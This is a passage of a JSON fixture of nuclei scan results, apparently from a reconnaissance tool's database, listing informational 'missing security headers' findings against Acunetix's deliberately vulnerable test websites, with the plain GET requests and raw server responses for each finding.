"startScan.vulnerability", + "pk": 574, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-resource-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0' 'http://testhtml5.vulnweb.com/login'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/login", + "discovered_date": "2024-11-13T02:41:26.353Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /login HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 405 METHOD NOT ALLOWED\r\nConnection: close\r\nContent-Length: 178\r\nAllow: POST, OPTIONS\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">\n<title>405 Method Not Allowed</title>\n<h1>Method Not Allowed</h1>\n<p>The method is not allowed for the requested URL.</p>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 575, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-resource-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_16) AppleWebKit/561.9 (KHTML, like Gecko) Version/11.7.81 Safari/561.9' 'http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:202'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:202", + "discovered_date": "2024-11-13T02:41:26.494Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /static/app/libs/sessvars.js:202 HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_16) AppleWebKit/561.9 (KHTML, like Gecko) Version/11.7.81 Safari/561.9\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 576, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-permitted-cross-domain-policies", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:123.0) Gecko/20100101 Firefox/123.0' 'http://testhtml5.vulnweb.com/admin'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/admin", + "discovered_date": "2024-11-13T02:41:26.645Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /admin HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:123.0) Gecko/20100101 Firefox/123.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 308 PERMANENT REDIRECT\r\nConnection: close\r\nContent-Length: 253\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nLocation: http://localhost/admin/\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">\n<title>Redirecting...</title>\n<h1>Redirecting...</h1>\n<p>You should be redirected automatically to target URL: <a href="http://localhost/admin/">http://localhost/admin/</a>. If not click the link.", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 577, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-permitted-cross-domain-policies", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 Edg/91.0.864.48' 'http://testhtml5.vulnweb.com/ajax/archive'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/ajax/archive", + "discovered_date": "2024-11-13T02:41:26.804Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /ajax/archive HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 Edg/91.0.864.48\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 2\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n[]", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 578, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "referrer-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203' 'http://testphp.vulnweb.com/CVS/Repository'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/CVS/Repository", + "discovered_date": "2024-11-13T02:41:26.968Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /CVS/Repository HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 8\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:40:56 GMT\r\nEtag: "4dca64a4-8"\r\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\r\nServer: nginx/1.19.0\r\n\r\nacupart\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 579, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "clear-site-data", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36 Edg/88.0.705.50' 'http://testhtml5.vulnweb.com/.carousel'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/.carousel", + "discovered_date": "2024-11-13T02:41:27.120Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /.carousel HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36 Edg/88.0.705.50\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 NOT FOUND\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">\n<title>404 Not Found</title>\n<h1>Not Found</h1>\n<p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 580, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-resource-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36' 'http://testhtml5.vulnweb.com/comment'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/comment", + "discovered_date": "2024-11-13T02:41:27.265Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /comment HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html>\n<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">\n<head>\n <meta charset="utf-8">\n <title>SecurityTweets</title>\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <meta name="description" content="">\n <meta name="author" content="">\n\n <!-- Le styles -->\n <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">\n <!--<link href="http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css" rel="stylesheet">-->\n <link href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'>\n <link href="/static/css/style.css" rel="stylesheet">\n <style type="text/css">\n body {\n padding-top: 60px;\n padding-bottom: 40px;\n }\n .sidebar-nav {\n padding: 9px 0;\n }\n\n @media (max-width: 980px) {\n /* Enable use of floated navbar text */\n .navbar-text.pull-right {\n float: none;\n padding-left: 5px;\n padding-right: 5px;\n }\n }\n </style>\n</head>\n\n<body>\n\n<div class="navbar navbar-fixed-top">\n <div class="navbar-inner">\n <div class="container-fluid">\n <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n </button>\n <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security">&nbsp;&nbsp;&nbsp;&nbsp;</a>\n <p class="navbar-text pull-left">\n HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.\n </p>\n </div>\n </div>\n</div>\n\n<div class="container-fluid">\n <div class="row-fluid">\n <div class="span2">\n <div class="well sidebar-nav">\n <ul class="nav nav-list">\n <li class="nav-header">Action</li>\n <li class="active"><a href="#/response">Response</a></li>\n\n <li class="nav-header">Acunetix</li>\n <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>\n <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>\n <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>\n <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>\n </ul>\n </div><!--/.well -->\n </div><!--/span-->\n <div class="span10">\n <div class="row-fluid">\n \n Sorry, but commenting is currently disabled! <!-- invalid -->\n \n </div><!--/row-->\n </div><!--/span-->\n </div><!--/row-->\n\n <hr>\n\t\n\t<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">\n\t\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>\n\t</div>\n\n <footer>\n <p>&copy; Acunetix Ltd. 2019</p>\n </footer>\n\n</div><!--/.fluid-container-->\n\n<!-- Le javascript\n================================================== -->\n<!-- Placed at the end of the document so the pages load faster -->\n<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>\n<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>\n<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>\n<script src="/static/app/app.js"></script>\n\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 581, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "clear-site-data", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Edg/96.0.1054.53' 'http://testhtml5.vulnweb.com/contact'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/contact", + "discovered_date": "2024-11-13T02:41:27.410Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /contact HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Edg/96.0.1054.53\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 405 METHOD NOT ALLOWED\r\nConnection: close\r\nContent-Length: 178\r\nAllow: POST, OPTIONS\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">\n<title>405 Method Not Allowed</title>\n<h1>Method Not Allowed</h1>\n<p>The method is not allowed for the requested URL.</p>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 582, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-frame-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/604.4.15 (KHTML, like Gecko) Version/16.3 Safari/604.4.1' 'http://testhtml5.vulnweb.com/forgotpw'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/forgotpw", + "discovered_date": "2024-11-13T02:41:27.554Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /forgotpw HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/604.4.15 (KHTML, like Gecko) Version/16.3 Safari/604.4.1\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 405 METHOD NOT ALLOWED\r\nConnection: close\r\nContent-Length: 178\r\nAllow: POST, OPTIONS\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">\n<title>405 Method Not Allowed</title>\n<h1>Method Not Allowed</h1>\n<p>The method is not allowed for the requested URL.</p>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 583, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-opener-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36' 'http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:105at'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:105at", + "discovered_date": "2024-11-13T02:41:27.702Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /static/app/libs/sessvars.js:105at HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 584, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-content-type-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.32' 'http://testhtml5.vulnweb.com/static/app/partials'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/static/app/partials", + "discovered_date": "2024-11-13T02:41:27.853Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /static/app/partials HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.32\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 403 Forbidden\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:50 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>403 Forbidden</title></head>\r\n<body>\r\n<center><h1>403 Forbidden</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 585, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "permissions-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36' 'http://testhtml5.vulnweb.com/samples'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/samples", + "discovered_date": "2024-11-13T02:41:28.008Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /samples HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"\n "http://www.w3.org/TR/html4/loose.dtd">\n<html>\n<head>\n <title>Python samples</title>\n</head>\n<body>\n <h3>Simple python programs:</h3>\n <ul>\n <li><a href="/getfile?fname=sample1.py">First sample</a></li>\n <li><a href="/getfile?fname=sample1.py">Second sample</a></li>\n </ul>\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 586, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-resource-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0 maglev/24046.2809.2757.3796/49' 'http://testphp.vulnweb.com/CVS/Entries.Log'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/CVS/Entries.Log", + "discovered_date": "2024-11-13T02:41:28.164Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /CVS/Entries.Log HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0 maglev/24046.2809.2757.3796/49\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: 